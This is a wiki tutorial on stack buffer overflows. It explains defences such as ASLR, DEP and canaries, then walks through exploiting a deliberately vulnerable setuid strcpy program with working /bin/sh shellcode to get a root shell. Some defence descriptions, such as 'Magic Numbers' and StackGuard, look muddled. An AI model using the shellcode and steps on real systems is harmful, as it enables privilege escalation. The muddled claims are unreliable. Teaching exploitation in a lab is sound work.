
Difference between revisions of "Buffer overflow"

From NetSec
Revision as of 17:20, 25 November 2011

A buffer overflow, or buffer overrun, is a software error triggered when a program does not adequately control the amount of data copied into a buffer. If that amount exceeds the buffer's preassigned capacity, the remaining bytes are written to adjacent memory, overwriting its original contents. This may lead to arbitrary code execution and allow access to a vulnerable system.

Description

A computer receives input, remembers what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300, overwriting the instructions in boxes 201-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user were an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. The attacker therefore has to know enough about the system to know what address the malicious instructions will end up at; otherwise the attacker will not know the correct return address to put into P.O. box 201. In other words, the attacker has to have precise aim, or the attack will be unsuccessful.
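
The post office analogy can be modeled in a few lines of C. This is only a sketch of the analogy, not of real process memory: the struct post_office type and the deliver_unchecked and deliver_checked functions are hypothetical names made up for illustration, and box 201 (index 200) is assumed to hold the return address.

```c
#include <stddef.h>
#include <string.h>

#define DATA_BOXES  200   /* boxes 1-200 are reserved for user data */
#define TOTAL_BOXES 500   /* the whole post office */

/* Hypothetical model: boxes[200] (P.O. box 201) plays the return address. */
struct post_office {
    int boxes[TOTAL_BOXES];
};

/* Insecure delivery: takes whatever it is given, starting at box 1. */
void deliver_unchecked(struct post_office *po, const int *mail, size_t count)
{
    if (count > TOTAL_BOXES)
        count = TOTAL_BOXES;   /* keep the simulation itself in bounds */
    memcpy(po->boxes, mail, count * sizeof mail[0]);
}

/* Secure delivery: refuses anything beyond the 200 data boxes.
 * Returns 0 on success and -1 when the mail is rejected. */
int deliver_checked(struct post_office *po, const int *mail, size_t count)
{
    if (count > DATA_BOXES)
        return -1;             /* "I'm not taking any more mail" */
    memcpy(po->boxes, mail, count * sizeof mail[0]);
    return 0;
}
```

Delivering 201 pieces of mail through deliver_unchecked replaces the value in box 201 with the attacker's last piece of mail, while deliver_checked rejects the same delivery and leaves box 201 untouched.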

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for your shellcode.


Defenses

Multiple defenses have been built into the runtime environment in an attempt to fight buffer overflows and prevent them from being exploited. One of them is ASLR, which stands for Address Space Layout Randomization. With ASLR, every time the computer reboots and every time a program runs, the address space that the program lives in changes. In other words, following our mailbox analogy, the return address will never be in the same mailbox. The point is to prevent an attacker from performing a buffer overflow exploit, because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim the attack correctly without having to know a return address.
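
One way to observe ASLR is to print the address of a stack variable on several runs and compare the results. The sketch below assumes a Linux-style system; stack_address and print_stack_address are hypothetical helper names, not part of any library.

```c
#include <stdint.h>
#include <stdio.h>

/* Returns the address of a local variable, that is, a location on the stack. */
uintptr_t stack_address(void)
{
    volatile char marker = 0;
    uintptr_t addr = (uintptr_t)&marker;
    return addr;
}

/* Prints the address so that separate runs of the program can be compared. */
void print_stack_address(void)
{
    printf("stack variable at 0x%lx\n", (unsigned long)stack_address());
}
```

Calling print_stack_address from main and running the program a few times should normally print a different address on each run while ASLR is enabled, and the same address once it has been disabled, provided the environment and arguments stay the same.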

Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. DEP marks data regions such as the stack as non-executable, so that machine code (the code that buffer overflow payloads are crafted in) placed in a data segment cannot be run, even if the return address is changed to point into it. To combat defenses, attackers have developed ASCII and polymorphic ASCII machine code. ASCII and polymorphic ASCII code looks like normal user input instead of machine code. Note that this only disguises the payload; it does not by itself make a non-executable region executable.

A further defense mechanism is called StackGuard, which adds another layer of protection on top of Data Execution Prevention. StackGuard attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from inside the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. In compilers, StackGuard refers to a technique that places a canary value next to the saved return address and verifies it before the function returns.

So with CSA, ASLR, and operating-system-supplied DEP, successfully performing a buffer overflow exploit against a system running CSA is extremely difficult. Any attacker who makes it to the point where CSA catches the attack is already very advanced. To successfully subvert ASLR, DEP and StackGuard one must use polymorphic ASCII shellcode: machine code that self-modifies, looks like standard user input, and has all of its own functions built into its own code. The return address must always be supplied as raw bytes rather than printable text, so it will usually show up as odd characters such as squares or strange symbols. In a real buffer overflow exploit attempt, the IDS or HIDS context buffer will show four squares or symbols on the end on 32-bit systems, and eight on 64-bit systems.

Maximum Effectiveness

Sometimes attackers and pen-testers alike use what is called second stage shellcode. Firewall rules will often block all outgoing connections from a server machine and all incoming connections except those on the specified server port. Second stage shellcode works around this by first finding the connection that the exploit originated from, and then sending the output of the arbitrary functions back along that same connection, so that the firewall has no new connection to block.

Buffer overflows can be used remotely to gain partial or total system access, or they can be used locally to escalate privileges inside the operating system in order to gain system or root level access. The real threat of a buffer overflow is the "Zero-Day attack": an exploit for a vulnerability, here a buffer overflow, that the security world has never seen before. Zero-day or 0day attacks are the most devastating to the security industry. They fuel worms and viruses, and sometimes lead to hundreds of thousands of systems being compromised in a single day.

Causes

Buffer overflows exist because of a combination of insecure language compilers, careless programmers, and CPU architectures that keep the return address of a function call on the stack. A programmer should be able to check input to the data segment with relative ease. However, coders are often either ignorant of the problem or overlook the flaw, and sometimes a disgruntled employee might even code the vulnerability into an application for personal gain after the application goes to production.
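
As a rough illustration of how little code such a check takes, here is a minimal sketch of a bounds-checked string copy. The name copy_checked is hypothetical; it is one possible way to write the check, not a standard library function.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success and -1 if an argument is missing or src is too long. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;             /* refuse rather than overflow */

    memcpy(dst, src, len + 1); /* len + 1 also copies the NUL byte */
    return 0;
}
```

A caller would pass sizeof buffer as dst_size and treat a return value of -1 as rejected input instead of continuing with a truncated or overflowing copy.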

Example

Let's first disable ASLR. This makes it easier for our proof of concept to be successful. There are other methods of bypassing ASLR, but we will not cover them here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit
 exit
 teknical@teknical-vm:~$ 


Our test application is below. Notice we have a fixed-size buffer of 100 bytes allocated on the stack. This is what we will be overflowing. Calling strcpy on unchecked input is actually very common. It is something you should stay away from to prevent your own applications from being exploited.

 teknical@teknical-vm:~$ cat bof.c
 #include <stdlib.h>
 #include <stdio.h>
 #include <string.h>
 
 int main(int argc, char *argv[]){
 	char buffer[100];
 	strcpy(buffer,  argv[1]);
 	return 0;
 }

Let's compile our test application. We will use the -g option of gcc to tell the compiler to include debugging symbols. This makes it easier for us to debug during our attempts to achieve code execution.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Now that our test application is compiled, we can attempt to trigger the vulnerability. We know that our buffer can only hold 100 bytes, so let's test by passing it 104 bytes, which should cause an overflow. We use ruby to dynamically build a 104-byte string. You can also use perl if you prefer.


 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated


Wait... what is this? Newer versions of gcc and other modern compilers include code by default that serves to protect the stack. We will not go into detail about that in this lesson.
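
Without going into detail, the general idea behind this kind of check can be modeled by hand. The sketch below is a simulation only: the struct frame layout, the CANARY_VALUE constant and the function names are assumptions made for illustration, and a real compiler uses a random per-process value and its own frame layout.

```c
#include <stddef.h>
#include <string.h>

#define CANARY_VALUE 0xC0FFEEu   /* arbitrary value chosen for this sketch */

/* Hypothetical frame: the buffer, then a canary, then the return address. */
struct frame {
    char buffer[100];
    unsigned int canary;
    unsigned int return_address;
};

/* Sets up an empty frame with a fresh canary in front of the return address. */
void frame_init(struct frame *f, unsigned int return_address)
{
    memset(f->buffer, 0, sizeof f->buffer);
    f->canary = CANARY_VALUE;
    f->return_address = return_address;
}

/* Models an unchecked copy that can run past the buffer into what follows. */
void frame_write(struct frame *f, const unsigned char *data, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;         /* keep the simulation itself in bounds */
    memcpy(f, data, len);
}

/* The check performed before returning: has the canary been overwritten? */
int frame_intact(const struct frame *f)
{
    return f->canary == CANARY_VALUE;
}
```

In this model, writing 100 bytes leaves the canary alone, while writing 104 bytes or more overwrites it, which is the point at which a protected program would abort instead of returning.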

We need to compile our test application without the stack protection. This can be done by adding the -fno-stack-protector option to gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof

Now that we have recompiled our application with no stack protection, we can again attempt to trigger the vulnerability. We will start at 104 bytes and move up until we trigger the vulnerability.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

Notice that it took 112 bytes to successfully overwrite the saved ebp of the running application. We are now ready to attempt exploitation. Note that we will need 116 bytes to overwrite the return address on the stack.

For this example, we will be using a setuid binary to ensure we gain a root shell. We set up our bof binary as setuid root below.

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

DEP is another protection scheme, which prevents code on the stack from being executed. We can use 'execstack' to check whether our binary has an executable stack and to change that setting.

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that our application will NOT have an executable stack. This will prevent successful exploitation.

We can use the -s option to set our binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If we query again, we will notice an X in its place, which means that our stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof


Ok, back to the goods. Let's start up gdb and begin debugging.

We will use `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'` as the argument to our test application.

Let's examine this.

 `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`

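The shellcode we will be using is 45 bytes long: 38 bytes of machine code followed by the 7-byte string /bin/sh. It executes /bin/sh to drop a shell, and we run it against our setuid binary.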

 \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

We know that we need 112 bytes to overwrite ebp, and another 4 to overwrite the return address. We will pad our shellcode with 60 NOPs in front of it: 60 + 45 = 105. That leaves 7 more bytes to finish overwriting ebp and another 4 to overwrite the return address. I prefer to use 0x41/'A' for this portion, because it is easier to debug with. We add 7 bytes of 'A', and then 4 more on the end as a placeholder for our return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes we need to overwrite the return address and successfully exploit our target.
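
The arithmetic above can be double-checked with a small layout builder. This is a sketch under the byte counts given in this article; the enum names and build_layout are hypothetical, and the letter 'S' is only a placeholder marking where the 45 bytes of shellcode would go.

```c
#include <stddef.h>
#include <string.h>

enum {
    NOP_COUNT     = 60,   /* NOP padding in front of the shellcode */
    SHELLCODE_LEN = 45,   /* length of the shellcode used in this article */
    FILLER_LEN    = 7,    /* 'A' bytes that finish overwriting ebp */
    RET_LEN       = 4,    /* return address on a 32-bit system */
    PAYLOAD_LEN   = NOP_COUNT + SHELLCODE_LEN + FILLER_LEN + RET_LEN
};

/* Fills out with the payload layout, using 'S' as a stand-in for shellcode.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_layout(unsigned char *out, size_t out_size)
{
    size_t off = 0;

    if (out_size < (size_t)PAYLOAD_LEN)
        return 0;

    memset(out + off, 0x90, NOP_COUNT);    off += NOP_COUNT;
    memset(out + off, 'S', SHELLCODE_LEN); off += SHELLCODE_LEN;
    memset(out + off, 'A', FILLER_LEN);    off += FILLER_LEN;
    memset(out + off, 0x41, RET_LEN);      off += RET_LEN;
    return off;
}
```

With these counts the function returns 116, the placeholder shellcode occupies offsets 60 through 104, and the last four bytes at offsets 112 through 115 are the ones that land on the return address.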


Start gdb.

 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.

Set a breakpoint inside of our "main" function.

 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.

Start our application with the command line we discussed above.

 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);

Now that we are in our main function, let's examine the stack. We know that we have at least 116 bytes on the stack, so let's examine 200 words (800 bytes) to make sure we have all we need. We are looking for the address of our shellcode on the stack.

 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 ---Type <return> to continue, or q <return> to quit---
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 ---Type <return> to continue, or q <return> to quit---
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

We are looking for our shellcode on the stack. The easiest thing to do here is to look for our NOPs. We need to find the address of our NOPs so that we can use it as the return address on the stack. This will cause execution to resume with our shellcode once the function returns.

Above we can see our NOPs starting at 0xbffff5f7, the last byte of the word shown at 0xbffff5f4. We will actually be using 0xbffff610, since it's a clean address inside the NOPs. We need to arrange this in little endian format: "\x10\xf6\xff\xbf"

Let's clear our breakpoint and restart our application with the same command line argument, but replace the "\x41\x41\x41\x41" at the end of our argument with our return address of "\x10\xf6\xff\xbf"
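
The byte reordering for little endian format can be written out explicitly. The following is a minimal sketch; pack_le32 is a hypothetical helper name, not a library function.

```c
#include <stdint.h>

/* Writes a 32-bit address into out[0..3], least significant byte first. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For the address 0xbffff610 this yields the bytes 0x10, 0xf6, 0xff, 0xbf, in that order.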

 (gdb) clear main
 Deleted breakpoint 1 
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/dash
 # whoami
 root
 # 


Yay! We have successful exploitation. If for some reason your exploitation was not successful, you could attempt a different return address. Later we will move into more advanced topics. I hope this was helpful.